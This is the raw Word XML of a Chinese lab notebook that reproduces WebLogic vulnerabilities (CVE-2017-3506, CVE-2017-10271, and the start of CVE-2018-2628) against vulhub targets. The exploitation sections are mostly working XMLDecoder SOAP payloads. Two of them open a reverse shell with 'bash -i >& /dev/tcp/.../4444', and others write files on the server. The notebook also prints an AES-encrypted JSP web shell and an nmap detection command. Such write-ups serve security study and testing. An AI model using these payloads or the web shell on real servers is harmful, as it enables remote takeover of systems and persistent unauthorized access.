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5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35.png"/>
  <Override ContentType="image/png" PartName="/word/media/document_image_rId36.png"/>
  <Override ContentType="image/png" PartName="/word/media/document_image_rId38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9.png"/>
  <Override ContentType="image/png" PartName="/word/media/document_image_rId60.png"/>
  <Override ContentType="image/png" PartName="/word/media/document_image_rId6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漏洞复现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Wqoue" w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkStart w:name="JSzX2" w:id="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 xml:space="preserve">Weblogic 反序列化漏洞 CVE-2021-2394 </w:t>
        <w:br/>
        <w:t xml:space="preserve">Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109 </w:t>
        <w:br/>
        <w:t xml:space="preserve">Weblogic RCE CVE-2020-14882&amp;14883 </w:t>
        <w:br/>
        <w:t xml:space="preserve">weblogic jndi注入CVE-2020-14841 </w:t>
        <w:br/>
        <w:t xml:space="preserve">Weblogic coherence组件iiop反序列化漏洞 (CVE-2020-14644) </w:t>
        <w:br/>
        <w:t xml:space="preserve">WebLogic UniversalExtractor反序列化漏洞 CVE-2020-14645 </w:t>
        <w:br/>
        <w:t xml:space="preserve">WebLogic CVE-2020-14756 T3IIOP反序列化RCE </w:t>
        <w:br/>
        <w:t xml:space="preserve">Weblogic 远程代码执行漏洞 CVE-2020-2883 </w:t>
        <w:br/>
        <w:t>Weblogic CVE-2020-2551 IIOP协议反序列化rce</w:t>
        <w:br/>
        <w:t xml:space="preserve">Weblogic反序列化漏洞 CVE-2019-2890 </w:t>
        <w:br/>
        <w:t xml:space="preserve">Weblogic反序列化远程代码执行漏洞CVE-2019-2725 </w:t>
        <w:br/>
        <w:t xml:space="preserve">Weblogic反序列化漏洞 CVE-2019-2729 </w:t>
        <w:br/>
        <w:t xml:space="preserve">Weblogic任意文件读取漏洞（CVE-2019-2615)） </w:t>
        <w:br/>
        <w:t>Weblogic 文件上传漏洞（CVE-2019-2618）</w:t>
        <w:br/>
        <w:t xml:space="preserve"> weblogic 反序列化漏洞 CVE-2018-3252 </w:t>
        <w:br/>
        <w:t xml:space="preserve">Weblogic反序列化远程代码执行漏洞 CVE-2018-3245 </w:t>
        <w:br/>
        <w:t xml:space="preserve">Weblogic远程代码执行漏洞 CVE-2018-3191 </w:t>
        <w:br/>
        <w:t xml:space="preserve">Weblogic任意文件上传漏洞（CVE-2018-2894） </w:t>
        <w:br/>
        <w:t xml:space="preserve">Weblogic WLS核心组件反序列化漏洞 CVE-2018-2893 </w:t>
        <w:br/>
        <w:t xml:space="preserve">Weblogic WLS Core Components 反序列化命令执行漏洞 CVE-2018-2628 </w:t>
        <w:br/>
        <w:t>WebLogic XMLDecoder反序列化漏洞（CVE-2017-10271）</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Weblogic 反序列化漏洞 CVE-2017-3506 </w:t>
        <w:br/>
        <w:t xml:space="preserve">Weblogic 反序列化漏洞 CVE-2017-3248 </w:t>
        <w:br/>
        <w:t>Weblogic SSRF漏洞 CVE-2014-4210</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:bookmarkStart w:name="l9G0Z" w:id="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CVE-2017-3506</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:bookmarkStart w:name="cMHXs" w:id="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0x00 漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:bookmarkStart w:name="ud658445c" w:id="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weblogic的WLS组件存在xmldecoder反序列化漏洞，直接post构造的</w:t>
      </w:r>
      <w:hyperlink r:id="rId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xml</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="4d4d4d"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>数据包即可rce。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:bookmarkStart w:name="zg9jA" w:id="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0x01 受影响WebLogic版本</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="5"/>
    <w:bookmarkStart w:name="ua1d028e4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10.3.6.0.0，12.1.3.0.0，12.2.1.1.0，12.2.1.2.0。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="6"/>
    <w:bookmarkStart w:name="qfOVI" w:id="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0x02 环境搭建</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="7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bookmarkStart w:name="uf20c631f" w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="808080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 靶机IP：192.168.124.29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="808080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击机：192.168.124.20 </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="8"/>
    <w:bookmarkStart w:name="u3569b6d1" w:id="9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使用vulhub搭建环境，并启动,切换到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="ff7a45"/>
        </w:rPr>
        <w:t xml:space="preserve"> /opt/vulhub/weblogic/CVE-2017-10271/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目录下执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="ff7a45"/>
        </w:rPr>
        <w:t>docker-compose up -d</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:name="iPags" w:id="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0x03 验证漏洞</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkStart w:name="u6475b900" w:id="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访问http://192.168.124.29:7001/wls-wsat/CoordinatorPortType 响应出现 Web Services证明存在该漏洞 </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:name="u187941f4" w:id="12"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="uccdebc6e" w:id="13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841999" cy="6951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126134" cy="12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bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:name="ue1b0b710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注意：漏洞不仅存在于 /wls-wsat/CoordinatorPortType 。 只要是在wls-wsat包中的Url皆受到影响，可以查看web.</w:t>
      </w:r>
      <w:hyperlink r:id="rId6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xml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得知所有受到影响的Url路径 </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkStart w:name="MLm2p" w:id="1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默认受到影响的Uri如下：</w:t>
        <w:br/>
        <w:t>/wls-wsat/CoordinatorPortType</w:t>
        <w:br/>
        <w:t>/wls-wsat/RegistrationPortTypeRPC</w:t>
        <w:br/>
        <w:t>/wls-wsat/ParticipantPortType</w:t>
        <w:br/>
        <w:t>/wls-wsat/RegistrationRequesterPortType</w:t>
        <w:br/>
        <w:t>/wls-wsat/CoordinatorPortType11</w:t>
        <w:br/>
        <w:t>/wls-wsat/RegistrationPortTypeRPC11</w:t>
        <w:br/>
        <w:t>/wls-wsat/ParticipantPortType11</w:t>
        <w:br/>
        <w:t>/wls-wsat/RegistrationRequesterPortType11</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkStart w:name="z09EH" w:id="1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0x04 攻击漏洞</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="16"/>
    <w:bookmarkStart w:name="u05791c23"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执行反弹shell命令</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:bookmarkStart w:name="uf6b32c70" w:id="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exploit</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="18"/>
    <w:bookmarkStart w:name="RS1N2" w:id="1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&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;soapenv:Header&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">          &lt;java&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">            &lt;object class="java.lang.ProcessBuilder"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">              &lt;array class="java.lang.String" length="3"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">                &lt;void index="0"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">                  &lt;string&gt;/bin/bash&lt;/string&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">                &lt;/void&gt;</w:t>
        <w:br/>
        <w:t>								&lt;void index="1"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">                  &lt;string&gt;-c&lt;/string&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">                &lt;/void&gt;</w:t>
        <w:br/>
        <w:t>								&lt;void index="2"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve"><![CDATA[                  <string>bash -i &gt;&amp; /dev/tcp/192.168.124.56/4444 0&gt;&amp;1</string>]]></w:t>
        <w:br/>
        <w:t xml:space="preserve">                &lt;/void&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">              &lt;/array&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">              &lt;void method="start"/&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">            &lt;/object&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">          &lt;/java&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;/work:WorkContext&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;/soapenv:Header&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;soapenv:Body/&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/soapenv:Envelope&gt;</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:bookmarkStart w:name="ue29d6491" w:id="20"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u0cd62ee8" w:id="21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="245948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0" cy="502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bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:name="u8fc3fa01" w:id="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写入文件</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:name="u4b3bfff4" w:id="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exploit</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:name="ikRNG" w:id="2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&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"&gt;</w:t>
        <w:br/>
        <w:t>&lt;soapenv:Header&gt;</w:t>
        <w:br/>
        <w:t>&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;</w:t>
        <w:br/>
        <w:t>&lt;java&gt;</w:t>
        <w:br/>
        <w:t>&lt;object class="java.io.PrintWriter"&gt;</w:t>
        <w:br/>
        <w:t>&lt;string&gt;servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp&lt;/string&gt;</w:t>
        <w:br/>
        <w:t>&lt;void method="println"&gt;</w:t>
        <w:br/>
        <w:t>&lt;string&gt;</w:t>
        <w:br/>
        <w:t>&lt;![CDATA[</w:t>
        <w:br/>
        <w:t>&lt;% out.print("test"); %&gt;</w:t>
        <w:br/>
        <w:t>]]&gt;</w:t>
        <w:br/>
        <w:t>&lt;/string&gt;</w:t>
        <w:br/>
        <w:t>&lt;/void&gt;</w:t>
        <w:br/>
        <w:t>&lt;void method="close"/&gt;</w:t>
        <w:br/>
        <w:t>&lt;/object&gt;</w:t>
        <w:br/>
        <w:t>&lt;/java&gt;</w:t>
        <w:br/>
        <w:t>&lt;/work:WorkContext&gt;</w:t>
        <w:br/>
        <w:t>&lt;/soapenv:Header&gt;</w:t>
        <w:br/>
        <w:t>&lt;soapenv:Body/&gt;</w:t>
        <w:br/>
        <w:t>&lt;/soapenv:Envelope&gt;</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:name="u71b44446" w:id="25"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u426f05e0" w:id="26"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841999" cy="24476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954933" cy="500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bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:name="u5e129cf1" w:id="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shell.jsp</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:name="ugRIS" w:id="2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&lt;![CDATA[</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;%!class U extends ClassLoader{</w:t>
        <w:br/>
        <w:t xml:space="preserve">    	U(ClassLoader c){</w:t>
        <w:br/>
        <w:t xml:space="preserve">            super(c);}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    public Class g(byte []b){</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return super.defineClass(b,0,b.length);}}</w:t>
        <w:br/>
        <w:t>	%&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;%if (request.getMethod().equals("POST")){</w:t>
        <w:br/>
        <w:t xml:space="preserve">    	String k="b8a7336f1f7528e1";session.putValue("u",k);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    	Cipher c=Cipher.getInstance("AES");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    	c.init(2,new SecretKeySpec(k.getBytes(),"AES"));</w:t>
        <w:br/>
        <w:t xml:space="preserve">    	new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}</w:t>
        <w:br/>
        <w:t>	%&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ]]&gt;</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:name="sN9Hq" w:id="2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CVE-2017-10271 </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:name="GmUkI" w:id="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0x00 漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:name="uf9dc1f65" w:id="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CVE-2017-10271是对CVE-2017-3506 的补丁绕过，将 object 替换成 void。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:name="oq3a6" w:id="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0x01 受影响WebLogic版本</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:name="u8d6310d9" w:id="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10.3.6.0.0，12.1.3.0.0，12.2.1.1.0，12.2.1.2.0。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:name="ObxYc" w:id="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0x02 环境搭建</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34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bookmarkStart w:name="uc9706cc5" w:id="35"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="808080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>靶机IP：192.168.124.56</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkStart w:name="u46eaf517" w:id="36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808080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击机IP：192.168.124.20</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:name="u6a3120bf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1、使用vulhub搭建环境，并启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="4d4d4d"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>切换到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="c7254e"/>
          <w:sz w:val="21"/>
          <w:shd w:fill="f9f2f4"/>
        </w:rPr>
        <w:t xml:space="preserve"> /opt/vulhub/weblogic/CVE-2017-10271/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="4d4d4d"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 目录下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="4d4d4d"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="c7254e"/>
          <w:sz w:val="21"/>
          <w:shd w:fill="f9f2f4"/>
        </w:rPr>
        <w:t>docker-compose up -d</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkStart w:name="F87Cq" w:id="3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0x03 攻击漏洞</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:name="ucbc1d988" w:id="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4d4d4d"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>写入文件</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:name="LsQly" w:id="4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&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;soapenv:Header&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">            &lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">                &lt;java version="1.6.0" class="java.beans.XMLDecoder"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    &lt;void class="java.io.PrintWriter"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">                        &lt;string&gt;servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt&lt;/string&gt;&lt;void method="println"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">                        &lt;string&gt;xmldecoder_vul_test11&lt;/string&gt;&lt;/void&gt;&lt;void method="close"/&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    &lt;/void&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">                &lt;/java&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">            &lt;/work:WorkContext&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;/soapenv:Header&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;soapenv:Body/&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/soapenv:Envelope&gt;</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:name="u23c070e0" w:id="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注意这里的类型不能丢，返回500状态码，即执行成功。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkStart w:name="uc206ae35" w:id="42"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u09d3fd93" w:id="43"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="24185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921067" cy="493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bookmarkEnd w:id="42"/>
    <w:bookmarkStart w:name="u50878598" w:id="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4d4d4d"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>执行反弹shell</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkStart w:name="dN3YV" w:id="4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&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"&gt; &lt;soapenv:Header&gt;</w:t>
        <w:br/>
        <w:t>&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;</w:t>
        <w:br/>
        <w:t>&lt;java version="1.4.0" class="java.beans.XMLDecoder"&gt;</w:t>
        <w:br/>
        <w:t>&lt;void class="java.lang.ProcessBuilder"&gt;</w:t>
        <w:br/>
        <w:t>&lt;array class="java.lang.String" length="3"&gt;</w:t>
        <w:br/>
        <w:t>&lt;void index="0"&gt;</w:t>
        <w:br/>
        <w:t>&lt;string&gt;/bin/bash&lt;/string&gt;</w:t>
        <w:br/>
        <w:t>&lt;/void&gt;</w:t>
        <w:br/>
        <w:t>&lt;void index="1"&gt;</w:t>
        <w:br/>
        <w:t>&lt;string&gt;-c&lt;/string&gt;</w:t>
        <w:br/>
        <w:t>&lt;/void&gt;</w:t>
        <w:br/>
        <w:t>&lt;void index="2"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve"><![CDATA[<string>bash -i &gt;&amp; /dev/tcp/192.168.190.1/4444 0&gt;&amp;1</string> ]]></w:t>
        <w:br/>
        <w:t>&lt;/void&gt;</w:t>
        <w:br/>
        <w:t>&lt;/array&gt;</w:t>
        <w:br/>
        <w:t>&lt;void method="start"/&gt;&lt;/void&gt;</w:t>
        <w:br/>
        <w:t>&lt;/java&gt;</w:t>
        <w:br/>
        <w:t>&lt;/work:WorkContext&gt;</w:t>
        <w:br/>
        <w:t>&lt;/soapenv:Header&gt;</w:t>
        <w:br/>
        <w:t>&lt;soapenv:Body/&gt;</w:t>
        <w:br/>
        <w:t>&lt;/soapenv:Envelope&gt;</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:name="u070673fc" w:id="46"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u0c6d2a1b" w:id="47"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="25471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0" cy="52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bookmarkEnd w:id="46"/>
    <w:bookmarkStart w:name="l0fFU" w:id="4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CVE-2018-2628</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="48"/>
    <w:bookmarkStart w:name="LaSRC" w:id="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代码审计</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="49"/>
    <w:bookmarkStart w:name="ubec61e99" w:id="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待添加</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="50"/>
    <w:bookmarkStart w:name="k01nM" w:id="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0x00 漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="51"/>
    <w:bookmarkStart w:name="ue80755e4" w:id="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Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序（客户端或者其它Weblogic Server实例）之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机（JVM）中, 并创建T3协议通信连接, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端口的应用上默认开启. 攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="4d4d4d"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>该漏洞主要由于T3服务触发，所有开放weblogic控制台7001端口，默认会开启T3服务，攻击者发送构造好的T3协议数据，就可以获取目标服务器的权限。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="52"/>
    <w:bookmarkStart w:name="u6376af78" w:id="53"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId11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4"/>
          </w:rPr>
          <w:t>weblogic t3 协议利用与防御</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="53"/>
    <w:bookmarkStart w:name="GzkMA" w:id="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0x01 受影响WebLogic版本</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="54"/>
    <w:bookmarkStart w:name="u94059fd8" w:id="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83a42"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>10.3.6.0,12.1.3.0,12.2.1.2, 12.2.1.3</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="55"/>
    <w:bookmarkStart w:name="R9hKL" w:id="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0x02 环境搭建</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="56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bookmarkStart w:name="uf08147ee" w:id="57"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="555666"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="eef0f4"/>
        </w:rPr>
        <w:t>靶机IP：192.168.124.139</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="555666"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="eef0f4"/>
        </w:rPr>
        <w:t>攻击机：192.168.124.20</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="57"/>
    <w:bookmarkStart w:name="en7pq" w:id="5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0x03 验证漏洞</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="58"/>
    <w:bookmarkStart w:name="u65cebb0f" w:id="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工具：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="4d4d4d"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId12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https://github.com/Lighird/CVE-2018-2628</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="59"/>
    <w:bookmarkStart w:name="u25a30eb6" w:id="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漏洞检测</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="60"/>
    <w:bookmarkStart w:name="IYemc" w:id="6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nmap -n -v -p 7001 192.168.124.139 --script=weblogic-t3-info -Pn 192.168.124.139</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="61"/>
